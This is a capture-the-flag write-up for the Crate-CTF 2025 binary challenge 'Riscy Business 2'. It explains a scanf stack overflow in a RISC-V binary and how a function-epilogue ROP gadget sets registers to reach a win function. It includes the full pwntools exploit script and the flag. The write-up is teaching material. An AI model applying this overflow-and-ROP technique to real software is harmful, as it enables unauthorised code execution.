Riscy Business 2

By Sibech, 0-Day Aarhus

Ett ännu mer riscabelt program!

nc challs.crate.nu 40002

Solves: 14

Prelude

This is a write-up for a binary exploitation challenge at Crate-CTF 2025. The challenge is a follow-up to a challenge from Crate-CTF 2024, where I sadly didn't participate.

Prior to this I haven't had any experience in exploiting a binary for the RISC-V architecture. I learned a lot about the architecture, and also got to leverage some knowledge about compiler design.

Getting acquainted

We'll start by running file on the binary to get an idea of what we are working with.

$ file riscy_business2
riscy_business2: ELF 64-bit LSB executable, UCB RISC-V, RVC, double-float ABI, version 1 (SYSV), statically linked, BuildID[sha1]=26b7f5c80199480fb669e23d85f0f79350433dbb, for GNU/Linux 4.15.0, not stripped

Its a 64-bit little-endian ELF binary compiled for the RISC-V architecture. Symbols aren't stripped from it so debugging won't be tedious.

Notably the binary is statically linked, which means the usual code execution vectors through libc aren't possible - unless of course the binary uses any of the relevant functions. What this does give us is a lot of potential ROP gadgets given PIE is disabled or a PIE leak, that normally would've been inaccessible without a libc leak.

Next up, lets use checksec to see what mitigations are enabled.

$ pwn checksec riscy_business2
    Arch:       riscv64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x10000)
    Stripped:   No

NX is enabled, so shellcode shenanigans are off the table. The writable GOT and the stack canary didn't end up being relevant. Most importantly, PIE happens to be disabled. We won't need a PIE leak to use the gadgets.

Time to decompile and take a look at what the program does. Starting with main:

int __cdecl main(int argc, const char **argv, const char **envp)
{
    char v4[264]; // [sp+0h] [-108h] BYREF

    setvbuf(stdout, 0LL, 2LL, 0LL);
    printf("Hello again, what's your name?\n> ");
    if ( _isoc99_scanf("%s", v4) != 1 )
    _assert_fail("scanf(\"%s\", buf) == 1", "riscy_business2.c");
    printf("Nice to meet you %s, but now I must go.\n", v4);
    return 0;
}

Not really much going on here. There's a pretty trivial buffer overflow, because scanf will keep reading input into the fixed size buffer v4 until it receives a whitespace character (space, \n, \t etc.).

Interestingly, main doesn't have a stack canary. My guess is some of the statically linked libc functions have canaries, which is what checksec ended up detecting.

Turns out there's also a win function,

void __fastcall __noreturn win(__int64 a1, __int64 a2, __int64 a3)
{
    const char *v6; // a0

    v6 = (const char *)getenv("FLAG");
    if ( !v6 )
    v6 = "Did not find a flag :(";
    if ( a1 == 123 && a2 == 321 && a3 == 2 )
    puts(v6);
    exit(0LL);
}

So we get the flag by redirecting execution to win and setting the three arguments to 123, 321, and 2 according to the RISC-V calling convention.

We can't cheese the parameter check by redirecting past it, because then the flag won't be loaded into memory.

Running and debugging

Lets get set up now that we have an idea of what needs to happen. First we'll need to set the FLAG environment variable. In bash this is done like so,

$ export FLAG=cratectf{testflag}

Through some dark magic I am unaware of I can directly run the binary on a x86-64 machine, but GDB is not happy about it so we'll set up some infrastructure.

Kudos, if you already have a RISC-V machine.

We'll use QEMU to emulate RISC-V and GDB multiarch to debug it. For good measure lets also get the binutils. As I'm on Ubuntu the needed packages are easily available with apt.

$ sudo apt install gdb-multiarch qemu-user qemu-user-static binutils-riscv64-linux-gnu

After installing, we can run the binary with a GDB server enabled. QEMU will pause the program and wait for GDB to attach on port 1234.

$ qemu-riscv64 -g 1234 ./riscy_business2

I made a file, init, which contains GDB script that sets the architecture, connects to the GDB server and creates a breakpoint on the main.

init-pwndbg
set architecture riscv:rv64
target remote:1234
b main

I've set up init-pwndbg to start pwndbg through GDB.

And now, finally, we can debug.

$ gdb-multiarch riscy_business2 -x init

Getting PC control

From earlier we know there's a buffer overflow in main. main terminates by loading the return-address from the stack and jumping to it.

0000000000010632 <main>:
    . . .
    1067a:    60b2                    ld    ra,264(sp)
    1067c:    6151                    addi    sp,sp,272
    1067e:    8082                    ret
    . . .

ret is a pseudoinstruction for jalr zero, ra, 0, which loads the value stored in the return-address register ra into the program counter pc.

Utilizing the buffer overflow we can overwrite the saved return-address on the stack, and redirect the program to wherever we want.

*PC   0x1069e (win) ◂— c.addi sp, -0x20

Gadget hunting

Well we can call win, but the registers aren't set correctly. To set them we're gonna have to do some ROP. Apparently, ROPgadget has support for the RISC-V architecture, so I spent a while trying to find gadgets with it without any luck.

Turns out finding gadgets that mutate any of the function argument registers a0-a7, and also doesn't derail the chain, for example with a relative jump, is excruciatingly difficult.

Quick compiler-design tangent to explain why this happens.

When a function wants to call another function, it must place the call’s arguments into registers according to the calling convention. In our case a0–a7. These registers may contain arguments belonging to the current function. Semantically, those arguments are in scope for the entire duration of the function. The compiler can’t just overwrite them without saving the value somewhere, usually the stack, so the registers can be restored before returning.

What if a function makes multiple calls? Repeatedly saving and restoring the registers would be inefficient. So instead, the compiler stores the values once at the very beginning of the function, and copies them into callee-saved registers (s0-s11 for RISC-V). This is called the function prologue.

Before returning from the function call, in what's called the function epilogue, every callee-saved register is restored by loading the stored values. The epilogue is also responsible for loading the saved-return address.

As a result most operations involving a0-a7 take place before it branches to another function, which is likely to make us lose control of the program. Luckily, we can take advantage of the prologue/epilogue structure instead.

If we take a look at the disassembly for win, we can see that the registers it really compares against are s0, s1 and s2.

000000000001069e <win>:
    1069e:    1101                    addi    sp,sp,-32
    106a0:    ec06                    sd    ra,24(sp)
    106a2:    e822                    sd    s0,16(sp)
    106a4:    e426                    sd    s1,8(sp)
    106a6:    e04a                    sd    s2,0(sp)
    106a8:    842a                    mv    s0,a0
    106aa:    84ae                    mv    s1,a1
    106ac:    8932                    mv    s2,a2
    ...
    106bc:    07b00793              li    a5,123
    106c0:    00f40a63              beq    s0,a5,106d4 <win+0x36>
    ...
    106d4:    14100793              li    a5,321
    106d8:    fef496e3              bne    s1,a5,106c4 <win+0x26>
    ...
    106dc:    4789                    li    a5,2
    106de:    fef913e3              bne    s2,a5,106c4 <win+0x26>
    106e2:    51d0e0ef              jal    1f3fe <_IO_puts>
    ...

So instead of a0, a1 and a2 we can just set s0, s1 and s2. What would be the perfect gadget for that? A function epilogue!

An epilogue wasn't generated for win by the compiler, since it'll always end up calling exit and terminate prematurely. Lets go digging for one in other parts of the binary. In this scenario I find it easier to just dump all the disassembly, and manually search for a suitable one instead of using ROPgadget.

$ riscv64-linux-gnu-objdump -d ./riscy_business2 > gadgets.s

Ended up finding this one quite quickly,

   138be:    60e2                    ld    ra,24(sp)
   138c0:    6442                    ld    s0,16(sp)
   138c2:    64a2                    ld    s1,8(sp)
   138c4:    6902                    ld    s2,0(sp)
   138c6:    6105                    addi    sp,sp,32
   138c8:    8082                    ret

Importantly, the address of the gadget doesn't contain a whitespace character, which was the restriction imposed by scanf on the overflow.

ROP'ing

With our new gadget in hand we can create our ROP chain. We'll overflow up to the saved return-address, then overwrite it with the address of our gadget. The gadget loads the next four values on the stack into respectivly s2, s1, s0 and ra, so we'll write 2, 321, 123 and the address of win after the address of the gadget.

But there's just one last problem. When win is called, the values in a0, a1 and a2 will be moved into s0, s1 and s2 resulting in failing the check. We can easily circumvent this by redirecting further into the win function - skipping the function prologue entirely.

Delivering this payload to the remote we get,

[+] Opening connection to challs.crate.nu on port 40002: Done
[*] Switching to interactive mode
Hello again, what's your name?
> Nice to meet you AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8v\x03, but now I must go.
cratectf{ojojoj_funktionsepiloger_är_ju_sig_lika}
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to challs.crate.nu port 40002

Script

from pwn import *

if args.REMOTE:
    io = remote("challs.crate.nu", 40002)
else: 
    io = process(["qemu-riscv64", "-g", "1234", "./riscy_business2"])

win = 0x106ae 
gadget = 0x138be

p = b"A" * 264
p += p64(gadget)
p += p64(0x2)
p += p64(0x141)
p += p64(0x7b)
p += p64(win)

io.sendline(p) 

io.interactive()